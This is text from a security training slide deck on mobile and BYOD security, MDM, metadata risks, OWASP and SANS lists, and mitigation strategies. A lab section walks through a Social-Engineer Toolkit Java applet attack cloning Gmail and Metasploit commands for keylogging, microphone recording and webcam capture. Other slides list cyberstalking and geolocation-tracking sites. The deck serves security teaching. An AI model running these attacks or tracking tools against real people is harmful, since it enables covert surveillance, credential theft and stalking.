http://es-es.net/
Portable Device Hacking Made Easy
MS Information Assurance, CISSP, CWNA, CEH, MCSE, Security+, I-Net+, Network+, Server+, CNA, A+
erstaats@es-es.net http://es-es.net
Enterpersonal Impact
Blurring of professional/Work and private life
One device that serves both needs
How do you address the multitude of devices?
iPhone, Androids, Blackberry, Windows, etc.
Now multiple tablets
Netbook/Ultrabooks
Cloud Security implications
What are consumers expectations of network speed and
access
MiniPwner & Ipad
software
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Listed in Lab manual starting on Page 11
MiniPwner Here is a list of some of the software that comes installed:
Nmap network scanner
Tcpdump sniffer
Netcat Hacker’s swiss army knife
aircrack Wireless network analysis
kismet Wireless network analysis
perl Perl Scripting Language
openvpn VPN Client and Server
dsniff suite of sniffing and spoofing tools, including arpspoof
nbtscan NetBIOS Network Scanner
snort Sniffer, Packet Logger, Intrusion Detection System
samba2-client Windows File Sharing Client
elinks Text Based Web Browser
yafc FTP Client
openssh-sftp-client Secure File Transfer Client
Pwn Plug
•
•
•
•
•
•
Fully loaded. Wireless, 3G/GSM, & NAC/802.1x bypass!
Includes 3G, Wireless, & USB-Ethernet adapters
Fully-automated NAC/802.1x/RADIUS bypass!
Out-of-band SSH access over 3G/GSM cell networks!
One-click Evil AP, stealth mode, & passive recon
Maintains persistent, covert, encrypted SSH access to your target
network
• Tunnels through application-aware firewalls & IPS
• Supports HTTP proxies, SSH-VPN, & OpenVPN
The Compromise
•
Important things to keep in mind:
– Total security = fiction
– Most exploits are internal
– Most exploits do not involve decrypting data
– Humans are the weakest link:
•
Sate of Utah 25 Min Default PWD
Hacking is so easy a chimp can do it
Software demonstrated -- Use entirely at your
own risk and get Permission first
Ernest or Eric are not responsible for any
subsequent loss or damage whatsoever!
This knowledge is intended to be used responsibly so we can provide
environments that are secure, safe and accessible
Mobile Devices
Top 10 Mobile Risks
8
Top 10 Mobile Controls
OWASP 10 Mobile Controls & Design Principles
Identify and protect sensitive data on Perform data integration with third
the mobile device
party services/applications securely
9
Handle password credentials
securely on the device
Pay attention to the collection and
storage and use of the user’s data
Ensure sensitive data is protected in
transit
Implement controls to prevent
unauthorized access to paid-for
resources
. Implement user authentication
/authorization and session
management correctly
Ensure secure distribution
/provisioning of mobile applications
Keep the backend APIs (services)
and the platform (server) secure
Carefully check any runtime
interpretation of code for errors
Understand RISK!
Analyze risk
risk = (cost of an exploit)*(likelihood it will occur)
Mobile devices make this inexpensive and very possible (BeetleJuice)
inside of “Flame”
Demos:
Bypass DLP
(Safepod)
ANTI
FaceNif
WIFI Kill
Security Challenges
• Inherent trust. “It’s MY PHONE.”
• Portability is a benefit and a risk
• Controls if lost
• Lock/Erase? Implications of erasing personal data
• PIN security – secure or easy to do 1 handed
• What is resident in memory?
• Malware – whole new breed of malware and products
• Malicious apps
• Increasing
• How do you write secure apps?
• Social engineering providers – value of OOB
communication
• Where did my app come from ? What is a trusted
source?
What Your Mobile Phone Knows
Text messages, even deleted ones
Words in your personal dictionary
Facebook contacts
Tens of thousands of location pings
Every website ever visited
What locations you have mapped
Emails going back a month
Your photos with geolocation data attached – even if deleted
How many times you have checked your email
Any application ever installed on your device
http://www.theatlantic.com/technology/archive/2011/04/what-does-your-phone-know-aboutyou-more-than-you-think/237786/
Cell / Mobile Issues
Rogue Apps
Live malware found
How will you updated
Over the air or tethered
What about Bring your own Device
Geo tracking
Metadata collection
Jailbreakme.com
Publish standards of what you will or will not support
Poorly codded apps that limit password length complexity, and
allow paste
Running Wireshark from a mobile device
Embed Evil Java Apps
A pop-up asks if they want to open the Java application
They will, users tend to be very curious
The payload can be
Shell
Rootkit
VNC
Automatically run enumeration scripts when the victim runs the
application
Check PDF’s : http://blog.zeltser.com/post/5567384219/onlinetools-for-malicious-pdf-analysis
Walled out network
Mobile Device
Management (MDM)
Secures mobile devices beyond Just Email (i.e. ActiveSync)
Application Delivery system
Provision and Configure new devices
Asset tracking/Finding or deleting
A good list of MDM solutions and what they offer
http://www.enterpriseios.com/wiki/Comparison_MDM_Providers
How to do BYOD (IMO)
Bottom line
 Educate users
• Don’t divulge personal information
• Only friend “real” friends
• Stay away from the games and surveys
• If it is too good to be true, it probably is
• Use common sense…..!
• iOS/Android security is immature
• Device security measures can be evaded.
 Wall off apps that are unacceptable to your organization
 Use software to help secure devices
High-level Recommendations
(cont.)
• Enforce strong security on mobile
devices to the extent supported by the
platform
• Reduce the amount of data stored on
mobile devices
• Implement clear and strong terms of
acceptable use and legal protections
Smartphones Threats
Risk
Rating
Description
Data storage
High
Both iOS and Android devices can
store large amounts of data. Transfer
is possible via USB
tether(iOS/Android), Bluetooth and
removable Micro SD card(Android).
Circumventing network
controls
Medium
Increasingly, network data providers
offer options to use devices as an
Internet gateway for other computers.
Either by tethering a single computer
or making the device a Wi-Fi access
point, a user can access the Internet
outside of corporate network
connections of control
Recording device
Medium
High-quality audio and video
recording in a small form factor
presents a risk to confidential sites,
discussions, drawings, etc.
Advanced attacks
Low
Using device as a means of
advanced attack via Wi-Fi spoofing,
network snooping or other advanced
attacks is possible but would require
advanced user technical knowledge.
Device Security Audit …
Can Find:
• Security misconfigurations
• Lack of control implementation by device OS
• Data leakage into backups(local and cloud)
• Ability to modify controls on-device
• Breakable encryption
Remote wipe
• Remote wipe can be an effective method for preventing data
being compromised
• Removable media (SD cards) are normally not erased by
remote wipe routines
• Remote wipe cannot be actualized unless the device has a
data connection over Wi-Fi, cellular or satellite signal
• Companies should implement an effective remote wipe policy
Fundamental Elements
Platform
Hardware
Operating System
Management/Messagi
ng
iOS
Apple designs the
hardware, focused on
consumers
Apple developed and
maintains iOS. Updates
are currently pushed out
via iTunes with a high
percentage of users
updating their devices
quickly . Updates are
likely to move to overthe-air (OTA) very soon.
Apple has increased
device management
APIs, however it remains
limited compared to BES.
Third-party vendors
leverage the APIs to offer
MDM systems covering
iOS. Some features such
as Jailbreak detection
are not reliable.
Android
A large and growing list
of manufacturers develop
Android devices
Google is the primary
maintainer of Android but
accepts input from key
partners and even the
public. Updates are
pushed out by the
wireless carriers resulting
in a highly fragmented
and often out of date
ecosystem.
Android is beginning to
supply some device
management APIs
however it is limited
compared to BES. As
recently as version 2.1
key policies such as
passcode enforcement
and remote wipe were
not enforceable.
Leading providers
• Leaders in the MDM solutions field include:
»
»
»
»
»
AirWatch
MobileIron
Good Technology
Sybase Afaria
Zenprise
• Research has shown that many MDM security controls can be
evaded, and proper configuration of devices is important, so
post-implemetation testing is a must.
Where to start -Mobile/BYOD
•Device consistency--It is usually
•Have Stated Mobile Device Policy
•Make sure that users know mobile device policies
•Take security seriously— (Anti)
•Decide whether to allow personal devices
•Plan to deal with lost devices—and breakage issues
•Measure the impact of mobile devices on your network—
(bandwidth and network resources)
•Make sure that the IT staff is trained for mobile device support
Examples of file types that
contain metadata
JPG
EXIF (Exchangeable image file format)
IPTC (International Press Telecommunications Council)
PDF
DOC
DOCX
EXE
XLS
XLSX
PNG
MAC addresses, user names, edits, GPS info. It all depends on the file format.
Too many to name them all.
What Information is in
MetaData?
User Names:
Creators.
Modifiers .
Users in paths.
Operating systems
Printers.
Local and remote
Paths
Local and remote.
Network info.
Shared Printers.
Shared Folders.
ACLS.
Internal Servers.
NetBIOS Name.
Domain Name.
IP Address.
Database structures.
Table names.
Colum names.
Device hardware info
Photo cameras.
Private Info.
Personal data.
History of use.
Software versions.
Metadata Tools
FOCA
http://www.informatica64.com/DownloadFOCA/
Metagoofil
http://www.edge-security.com/metagoofil.php
Will extract a list of disclosed PATHs in the metadata, with this
information you can guess OS, network names, Shared resources,
etc also extracts MAC address from Microsoft Office documents
EXIF Tool
http://www.sno.phy.queensu.ca/~phil/exiftool/
EXIF Viewer Plugin
https://addons.mozilla.org/en-US/firefox/addon/3905
Jeffrey's Exif Viewer
http://regex.info/exif.cgi
Meta Data Images Lab
•Go to Metadata Tools
Then go to Jeffrey's Exif Viewer
http://regex.info/exif.cgi
•Photo 1
photo.JPG
•Where was the photo taken what was used to take the photo
Photo 2
_MG_5982_ES.jpg
What is the gender of the person you can not see?
User your own photoAdam Savage, of “MythBusters,” Read the full story
here: http://nyti.ms/917hRh
Turn off GPS function on
phones
Issues in BYOD and
Mobile environments
•
•
•
•
•
•
•
•
•
•
•
Does your AUP include Mobile devices
Wireless Capacity vs. Coverage
Where to start when securing mobile devices
Who is responsible for device security the student, parent, or
school?
What security do mobile devices need?
What are the policy issues to be considered?
How can safe and protected internet access be ensured?
How network loads can be predicted and what can be done to
control the network demand / load?
What security tools are available for smart phones, tablet devices
and so on?
What can be or should be installed on student owned devices?
What are other risks to be considered?
Acceptable Use Policy
• When using a mobile devices to access the Internet users
are required to connect using the Public network
• Set standards of security: Pin or Password to access device
• Mobile devices can only be used for specified purposes
• Any activity conducted on mobile devices cannot be
published without permission of ….. who are involved in the
text/image/video/audio file
• Staff will use appropriate mobile device etiquette by
respecting the privacy of other's device numbers and using
appropriate language with their mobile communication.
https://schoolweb.dysart.org/EdTech/Content.aspx?conID=479
WIFI Coverage vs. Capacity
Coverage does not grantee access especially with mobile devices
Drop your Radios strength & add more AP’s
Directional vs. Omni antennas
Client Type
Data
Voice
# of Clients per /AP
Examples
20-30
Laptops, tablet PC’s, Mobile
10-15
Wireless VoIP Phones, Badges
Hacking for the Masses
Anti app-- Finds open networks and shows all potential target devices.
The app offers up a simple menu with commands like "Man-In-The-Middle"
to eavesdrop on local devices, or even "Attack";
http://www.zimperium.com/anti.html
Put mobile devices on a separate VLAN with strict policy's in
place (ACL’s)
10 Min Break
Mobile Best Practices
Best Practices
•Enforce strong passwords
•Perform a remote wipe
•Perform an audit of security configurations and policies
•Encrypt local storage
•Enforce the use of virtual private network (VPN)
•Enforce wireless security policies for all mobile devices
• Backup and recovery of confidential data stored on
mobile devices
• Centralized configuration and software upgrades
WIFI Best Practices
•Use a WIDS solution to monitor for rogues in both
the 2.4 GHz and 5 GHz
•Periodically monitor for rogue APs using a handheld
monitor
•Use auditing techniques on the wired network to
discover intruders on the wireless
•Train employees not to connect to any ad hoc
WLANs
WIFI BP II
•Use 802.1X with EAP to provide mutual
authentication of users and servers
•Use one of the following EAP types: TLS, TTLS,
PEAP or FAST. Note that EAP-TLS requires
certificates on both sides
•If 802.1X is not deployed for the wired network, use
IPsec or SSL (if supported)
•Authenticate guests through a captive portal
webpage and monitor
Network BP
•Modify the default SSID
•Use a central WLAN system instead of
autonomous APs.
•Use strong passwords & Change passwords
periodically
•Disable wireless-side management
•Monitor vendor software updates and promptly
apply patches
•Use (SNMP) v3, Secure Shell (SSH), and SSL
•Restrict wired-side AP/controller access to
certain IP addresses, subnets and/or VLANs.
Tablet BP
•· Device lock: enable native device authentication (PIN,
password, pattern)
•· Anti-theft measures: Many tablets support remote lock or data
wipe … use of tablet "find me" services can also raise privacy
concerns.
•· Over-the-air encryption: All tablets can secure Web and email
with SSL/TLS, Wi-Fi with WPA2, and corporate data with mobile
VPN clients.
•· Stored data protection: Hardware and mobile OS support for
stored data encryption varies.
Tablet BPII
•Mobile application controls: Many downloaded apps require
access to sensitive data and features, understand what apps have
control to what data (Block iTunes on VPN)
•· Anti-malware: Tablets are not shipped with on-board anti-virus,
anti-spam, intrusion detection, or firewall apps.
•· Device management: For visibility, policy configuration, app
provisioning, schools can centrally manage tablets, no matter who
owns them.
BP for Owned Devices
•Enforce strong passwords for mobile device & network access
•Automatically lock out access after a 4+ of incorrect passwords
•Perform remote wipe when lost, stolen, sold, or sent for repair
•Perform a periodic audit
• Ensure that settings have not been modified
•Encrypt local storage, including all memory cards
•Enforce the use (VPN)
•Enforce the same wireless security policies for all devices
•Perform regular backup and recovery of confidential data
•Perform centralized configuration and software upgrades "over
the air"
Mobile security
management
•User authentication
•Password policy enforcement:
•Remote device wipe:
•White/black lists:
•Secure communication:
Mobile software
distribution
•Software packages:
•Package distribution:
•Mobile optimizations:
•Change control:.
Decisions
• Issued device (simplicity, consistency & cost) vs. What Do
Users Want
• Multiple device protection costs more
• What is needed for work?
• Impact of Innovation and Agility on what “need”
• Look at what OS’s need to support (OSX, Android, RIM,
Windows Mobile, Symbian, WebOS)
• Asset Management issues
• Tracking
• Assuring consistency of controls
• Policy – issue X. If you want to use something else then these
rules apply…
Other Considerations
• Enrollment Experience
• User self-enrollment – ease of use is critical.
•
•
•
•
•
•
Password/PIN policy decisions
Push capabilities turned on
Location services always on – battery impact
Jailbreak enforcement
Application blacklisting?
Encryption requirements
Lab Time
Labs
•
•
•
•
1 Email Privacy Tester https://emailprivacytester.com/
2 Pwned https://pwnedlist.com/
3 Bluestacks Click on ANTI
4 LANSearch Pro
•
5 SoftPerfect Network Scanner
6 Wireless Key
•
• 5. Other Nir Soft Utilities
Security Top Lists
How do you know if you
were hacked?
OWASP Top 10
A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards
Source: https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SANS
Top Cyber Security Risks
Priority One:
Client-side software that remains unpatched. 1outof6 home
Priority Two:
Internet-facing web sites that are vulnerable.
Operating systems continue to have fewer remotely-exploitable
vulnerabilities that lead to massive Internet worms.
Rising numbers of zero-day vulnerabilities
Source: http://www.sans.org/top-cyber-security-risks/
SANS Top 20
1: Inventory of Authorized and Unauthorized Devices
2: Inventory of Authorized and Unauthorized Software
3: Secure Configurations for Hardware and Software on Laptops,
Workstations, and Servers
4: Secure Configurations for Network Devices such as Firewalls,
Routers, and Switches
5: Boundary Defense
6: Maintenance, Monitoring, and Analysis of Audit Logs
7: Application Software Security
8: Controlled Use of Administrative Privileges
9: Controlled Access Based on the Need to Know
10: Continuous Vulnerability Assessment and Remediation
Source: http://www.sans.org/critical-security-controls/
SANS Top 20 Continued
11: Account Monitoring and Control
12: Malware Defenses
13: Limitation and Control of Network Ports, Protocols, and Services
14: Wireless Device Control
15: Data Loss Prevention
16: Secure Network Engineering
17: Penetration Tests and Red Team Exercises
18: Incident Response Capability
19: Data Recovery Capability
20: Security Skills Assessment and Appropriate Training to Fill Gaps
Source: http://www.sans.org/critical-security-controls/
SANS Top 25 Software Errors
Insecure Interaction Between Components
CWE ID
Name
CWE-89
Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection')
CWE-78
Improper Neutralization of Special Elements used in an OS
Command ('OS Command Injection')
CWE-79
Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting')
CWE-434 Unrestricted Upload of File with Dangerous Type
CWE-352 Cross-Site Request Forgery (CSRF)
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
Source: http://www.sans.org/top25-software-errors/
SANS Top 25 Software Errors
Risky Resource Management
CWE ID
Name
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer
Overflow')
CWE-22
Improper Limitation of a Pathname to a Restricted Directory
('Path Traversal')
CWE-494 Download of Code Without Integrity Check
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-676 Use of Potentially Dangerous Function
CWE-131 Incorrect Calculation of Buffer Size
CWE-134 Uncontrolled Format String
CWE-190 Integer Overflow or Wraparound
Source: http://www.sans.org/top25-software-errors/
SANS Top 25 Software Errors
Porous Defenses
CWE ID
CWE-306
CWE-862
CWE-798
CWE-311
CWE-807
CWE-250
CWE-863
CWE-732
CWE-327
CWE-307
CWE-759
Name
Missing Authentication for Critical Function
Missing Authorization
Use of Hard-coded Credentials
Missing Encryption of Sensitive Data
Reliance on Untrusted Inputs in a Security Decision
Execution with Unnecessary Privileges
Incorrect Authorization
Incorrect Permission Assignment for Critical Resource
Use of a Broken or Risky Cryptographic Algorithm
Improper Restriction of Excessive Authentication Attempts
Use of a One-Way Hash without a Salt
Source: http://www.sans.org/top25-software-errors/
Mitigation Strategies (Part 1)
Ranking
1
2
3
4
5
6
7
8
9
10
11
12
Strategy
Patch applications within 2 days for high risk vulnerabilities.
Patch O/S within 2 days for high risk vulnerabilities.
Minimize the number of local admins. Assign separate accounts.
Application white-listing: Prevent unauthorized programs.
HIDS/HIPS: Identify anomalous behavior.
E-mail content filtering: Allow only authorized attachments.
Block spoofed e-mail.
User education.
Web content filtering.
Web domain white-listing.
Web domain white-listing for HTTP/SSL.
Workstation inspection of Microsoft Office files.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Mitigation Strategies (Part 2)
Ranking
13
14
15
16
17
18
19
20
21
22
23
24
Strategy
Application-based workstation firewall: block incoming traffic.
Application-based workstation firewall: prevent outgoing traffic.
Network segregation.
Multi-factor authentication.
Randomized local admin passphrases. (Prefer domain groups)
Enforce strong passphrases.
Border gateway using an IPv6-capable firewall.
Data Execution Prevention.
Antivirus software with up to date signatures.
Non-persistent virtualized trusted operating environment.
Centralized and time-synchronized logging: network traffic.
Centralized and time-synchronized logging: computer events.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Mitigation Strategies (Part 3)
Ranking
25
26
27
28
29
30
31
32
33
34
35
Strategy
Standard O/S with unneeded functions disabled.
Application hardening: disable unneeded features.
Restrict access to NetBOIS features.
Server hardening.
Removable and portable media control.
TLS encryption between email servers.
Disable LanMan password support and cached credentials.
Block attempts to access web sites by their IP address instead of
by their domain name.
NIDS/NIPS: Identify anomalous traffic.
Gateway blacklisting to block access to known malicious
domains.
Full network traffic capture to perform post-incident analysis.
Source: http://www.dsd.gov.au/infosec/top-mitigations/top35mitigationstrategies-list.htm
Perceived Danger
Death by Shark at the Beach
The Real Danger
Death by Vending Machine at the Beach
APT-Focused Strategy
Risk-Based Approach
•
Initially implement subset of 20 Critical Controls to address Enterprises’
highest risks first (APT-related risks)
•
“Offense informs defense” concept suggests that 4 controls are best geared
to address APT-related risks
•
•
Controlled Access based on the Need-to-Know (Control 15)
Continuous Vulnerability Assessment and Remediation
•
•
Malware Defenses (Control 5)
Data Loss Prevention (DLP) (Control 17)
(Control 4)
Automation: Controls 15 & 17
(Focus on the Data)
Sensitive
Regulatory Data
Sensitive
Corporate Data
Credit card data
Privacy data (PII)
Health care information
Intellectual property
Control Data-at-Rest
Financial information
Trade secrets
Control Data-in-Motion
Control Data-in-Use
Automation: Controls 15 & 17
(Automating Data Classification and Policy Definition)
+
Business
Managers
Step 2
Create DLP Policy &
check for feasibility
DLP
Admin
End
Users
Step 1
Identify files &
set business rules

Step 3
DLP Policy is
routed for approval
Step 4
Approve
d
DLP
policy
Policy applied across the organization
Automation Approach: Controls 15 &
17
(Automating the Control of Data-in-Motion)
Process to Reach Automation (Data-in-Motion)
?
RISK
DISCOVER
(Data-in-Motion)
EDUCATE
(Data-in-Motion)
ENFORCE
(Data-in-Motion)
Risk Across: web protocols,
e-mails, IM, generic TCP/IP
protocols
Users Just-in-Time
Encryption, Blocking,
etc.
(Monitor Only)
Understand Risk
TIME
(Monitor & Educate)
Reduce Risk
(Automate Action)
Automation Approach: Controls 15 &
17
(Automating the Control of Data-at-Rest)
SharePoi
nt
Business
Users
Apply DRM
Database
s
NAS/SAN
Encrypt
Data Loss
Prevention
(DLP
File
Servers
Risk Remediation
Manager (RRM)
Delete / Shred
Change
Permissions
File Activity
Tools
GRC
Systems
Policy Exception
Endpoints
Discover Sensitive
Data
Manage Remediation
Workflow
Apply
Controls
Automation Approach: Controls 4 & 5
(Prevention and Mitigation of APTs/Understanding the Attack Vector)
Automation Approach: Controls 4 & 5
(Automating Continuous Monitoring of Malware
and Malware Callbacks)
Reducing risk of data loss through malware infections
•Implement basic and necessary malware protection – HIPS, AV,
AntiSpam, etc.
•Train and educate users concerning social engineering tactics.
•Use of advanced technology – Virtual inspection of executable
malware in real-time to identify and block command and control
communications.
Recommended Action Plan
1)
2)
3)
4)
5)
6)
Conduct gap assessment to compare Enterprises’s current security stance to
detailed critical controls
Implement “quick win” critical controls to address gaps
Implement controls numbers 4 & 5 using previous automation approaches
Implement controls numbers 15 & 17 using previous automation approaches
Analyze and understand how remaining controls (beyond quck wins, and
controls 4, 5, 15, 17) can be deployed
Plan for deployment, over the longer term, of the “advanced controls”, giving
priority to controls 4, 5, 15, 17
Building Secure Networks
Introduction
• SANS 20 Critical Security Controls for Effective
Cyber Defense
• Security Control 19 “Secure Network Engineering”
• Technical approaches to advance this control
• Scope is for Web/Mobile App and 40GbE
Secure Network Engineering
• Document Gathering is First Step
• Understand Data Flows
• Log Events and Correlate
• Apply Least Privileged Principles
• Divide and Secure
• Establish Trust and Validate Data Integrity
• Test and Validate Routinely
Next Generation Networks
• 40GbE is still early in “hype” cycle for Enterprises
• Throughput speed ≠ Wire speed
• Uncertainty increases relative to speed
• No forensic team experience with 40 GbE
• Existing operations resource capacity
Functional Requirements
1. Documentation
9. Virtual and Blade Servers
2. Data Center Physical Controls
10. Vulnerability and Threat Mgt
3. Enclaves
11. Log Mgt
4. Firewalls and Security Apps
12. Asset Mgt
5. Internet Access
13. Access Mgt
6. DNS
14. Performance Mgt
7. Hardening
15. Forensic Mgt
8. Config and Change Mgt
16. Service Mgt
Key Risk Considerations
• Mixing assets of different value
• Integrating security and network controls
• High event volume and Impact of false negatives
• Understanding data flows and security policies
• Performance impact of inspection
• Protecting high authority access
• Configuration errors and product defects
High-level Design
and Build Approach
N-Tier Application
Control Checklist
 Enclave for each app function
 Dedicated Internet Access
Firewall
 Security Fabric
 Separate Infrastructure Firewall
 SSL Accelerator and Proxies
 Tiered DNS
 Virtualization and Blade
Servers
 Netflow
 Network Address Translation
 Network Monitoring Switch
 Load Balancers
Lessons Learned
Pitfalls
•Poor Documentation
•Too many ACLs and Flows
•Netflow “meltdown”
•4 x10 Port Aggregation
•Virtual Switch Overload
•Poorly designed QoS
•Forensic Teams
Promising Solutions
•
Security Fabric
•
Firewall Policy Mgt
•
Virtual Switch Replacement
•
IEEE 802.1AE (MACsec)
Benefits
• Improved Security
• Increased Design Credibility
• Better Manageability
• Lower Total Costs
• Faster Response to Threats
Ultimately, adopting these design recommendations will provide a solid foundation
for safeguarding infrastructure and data at the highest speeds available today—and
tomorrow.
Social Media Issues
Facebook Content &
Spying
•Recently Facebook had both hardcore and gory images due to a hack…
•http://www.neowin.net/news/massive-hardcore-porn-outbreak-hits-facebook
•Facebook Visualizer -•Police can make profiles about a person such as where they would most likely
go if they were in trouble, where they might hide, what friends they would turn
to etc...
http://www.lococitato.com/facebookvisualizer/
•Generates animated, clickable maps of the relationships between Facebook
users.
•Features include profile summaries, export of networks to csv files, fast search
utility and storage of complete html code and download time
•They also have products for Myspace and YouTube.
Cyberstalking Sites
Lullar
Search using email or user name
http://com.lullar.com/
Spokeo
Searches lots of public Records to find information about
someone http://www.spokeo.com
KnowEm
Claims to check over 500 sites to see if a given user
name is taken
http://knowem.com
•Peek You old but still full of good info about someone
http://www.peekyou.com
http://www.googleguide.com/advanced_operators.html
Social Media Search
Engines
•Kurrently offers the ability to search both Facebook and Twitter in
real time
•Who’s Talkin It searches 60 social media gateways
•Socialmention Social Media Alerts : Like Google Alerts but for
social media
•Your Open Book Looks at profile status updates
Geolocation tools
• http://www.bing.com/maps
• http://twittermap.appspot.com
• http://www.fourwhere.com/
• http://icanstalku.com
• http://ip2geolocation.com
Cree.py
Great tool for geolocating/tracking Twitter/Foursquare
users.
http://ilektrojohn.github.com/creepy/
Network Domain Info online
RobTex
A great site for doing reverse DNS look-ups on IPs, grabbing
Whois contacts, and finding other general information about an IP
or domain name
http://www.robtex.com
ServerSniff
ICMP & TCP traceroutes, SSL Info, DNS reports and Hostnames
on a shared IP. It’s nice to have them do some of the recon for you
http://serversniff.net
Check if your email address has been owned
http://beta.serversniff.de/compromised.php
10 Min Break
Lab Time
Network Mapping
Portable apps
Angry IP Scanner let’s scan our local network what shares
are open
Wireless keyview find your key
WNetWatcher
inSSIDer 2.0
Netsparker - Community Edition
Attack_Surface_Analyzer_BETA_x64
WSCC -- Windows System Control Center
Google Hacking Diggity Project -- SearchDiggity.Client Google and
Bing “hacking”
FireFox portable
FreeScreenRecord–
HoffmanUtilitySpotlight2009_04 -- Rich Copy great copying
Commands
–
–
•
•
•
•
•
Enter option 2: Website Attack Vectors
Enter option 1: The Java Attack Method
Enter option 2: Site Cloner
Enter url https://gmail.com
It asks you "What payload do you want to generate:" and lists 11 choices
–
•
•
Enter no
It now shows blue text saying:
–
–
•
Press Enter for default
It asks you whether you want to create a Linux.OSX reverse_tcp payload.
–
•
Press Enter for default
It asks you to "Enter the PORT of the listener (enter for default):
–
•
Press Enter for default
It shows a list of 16 encodings to try and bypass AV.
–
•
cd /pentest/exploits/SET
./set
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit
launches, ending with this message:
msf auxiliary(smb) >
On the Target
• Open a Web browser and go to the Metasploit IP
address
– Works on IE, Firefox,
and Chrome
– User will see this
warning box
– Studies show that
users almost always
just click past
those warning boxes
GAME OVER
• The target is now owned. We can
–
–
–
–
–
–
Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take photo
Steal password hashes
Etc.
Fun & Games
• To remotely control the target:
– sessions -i 1
• Commands to try:
–
–
–
–
–
–
screenshot
keyscan_start
keyscan_stop
record_mic 10
webcam_list
webcam_snap 1
• McAfee found that one in every six personal computers have
zero protection: 17% of those scanned either had disabled or
nonexistent anti-virus software. The country with the lowest rating
was Singapore, with 21.75% of consumers unprotected. Perhaps
the most surprising: the United States ranked in the bottom 5
least protected, with 19.32% of consumers living without basic
security. The country with the highest percentage of basic security
protection was Finland, with only 9.7% of consumer PCs
unprotected. Consumers globally say 27% of their digital files
would be “impossible to restore” at all if lost, and not backed
up properly, and had an average value of $10,014 US
Resources
Resources
Vulnerabilities:
–OWASP (http://www.owasp.org)
–SANS Top 20 (www.sans.org/top20)
–National Vulnerability Database (http://nvd.nist.gov)
–cgisecurity (http//www.cgisecurity.com)
Guidance:
–National Institute of Standards and Technology (NIST)
Computer Security Resource Center
(http://csrc.nist.gov/publications/nistpubs/)
–Center for Internet Security (CIS)
(http://www.cisecurity.org/)
–Educause
(http://connect.educause.edu/term_view/Cybersecurity)